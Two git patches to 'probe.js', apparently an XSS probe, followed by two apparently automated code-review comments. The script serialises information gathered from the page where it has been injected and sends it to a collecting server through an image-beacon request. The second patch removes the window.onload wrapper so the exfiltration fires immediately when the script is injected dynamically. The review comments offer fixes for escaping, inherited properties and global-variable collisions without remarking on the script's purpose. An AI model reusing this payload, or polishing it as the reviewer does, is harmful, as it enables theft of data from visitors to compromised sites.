From 1ac995bd99a5a36e093fe3770c63147872e17c74 Mon Sep 17 00:00:00 2001
From: virusdefender
Date: Sun, 18 May 2014 21:03:24 +0800
Subject: [PATCH 1/2] change quotes

---
 probe.js | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/probe.js b/probe.js
index 317b38e..a1e4416 100644
--- a/probe.js
+++ b/probe.js
@@ -63,9 +63,9 @@ function json2str(o) {
 var arr = [];
 var fmt = function(s) {
 if (typeof s == 'object' && s != null) return json2str(s);
- return /^(string|number)$/.test(typeof s) ? "'" + s + "'" : s;
+ return /^(string|number)$/.test(typeof s) ? '"' + s + '"' : s;
 }
- for (var i in o) arr.push("'" + i + "':" + fmt(o[i]));
+ for (var i in o) arr.push('"' + i + '":' + fmt(o[i]));
 return '{' + arr.join(',') + '}';
 }

From ee5af581a458bbe10323c51ef6dd436f57cd3b6f Mon Sep 17 00:00:00 2001
From: virusdefender
Date: Sun, 18 May 2014 21:13:44 +0800
Subject: =?UTF-8?q?=E5=8E=BB=E6=8E=89=E4=BA=86window.onload?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

如果部分xss是动态插入dom的,这个js可能不会工作。 去掉windows.onload修改了这个问题。
---
 probe.js | 6 ++----
 1 file changed, 2 insertions(+), 4 deletions(-)

diff --git a/probe.js b/probe.js
index a1e4416..e7a7189 100644
--- a/probe.js
+++ b/probe.js
@@ -69,7 +69,5 @@ function json2str(o) {
 return '{' + arr.join(',') + '}';
 }

-window.onload = function(){
- var i = json2str(info);
- new Image().src = http_server + i;
-}
+var i = json2str(info);
+new Image().src = http_server + i;
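Review bot: Switching the delimiters to `"` in `fmt` and in the `for (var i in o)` line makes the output look like JSON, but keys and values are still concatenated unescaped, so any value containing `"`, `\` or a newline yields text that is not valid JSON. Since the serialized fields come from the page being inspected, whatever parses this on the receiving side has to treat it as untrusted and possibly malformed: a quote inside a value can close the string early and add keys of its own. Where the target browsers provide it, `return JSON.stringify(o);` would replace the hand-built string and escape correctly. The `for ... in` loop also picks up inherited enumerable properties; `if (Object.prototype.hasOwnProperty.call(o, i))` would limit it to own keys. The signature of json2str is visible only in the hunk header, so the start of the function is outside this hunk.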
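Review bot: The added top-level `var i = json2str(info);` now declares `i` in the script's outermost scope, whereas before it was local to the onload handler, so it can collide with or overwrite an existing global `i` on the host page. Dropping the temporary avoids that: `new Image().src = http_server + json2str(info);`. The two statements also run at script evaluation rather than after load, so any field of `info` that is filled in later would be missing. `info` and `http_server` are defined outside the hunk, so this should be confirmed against the rest of probe.js.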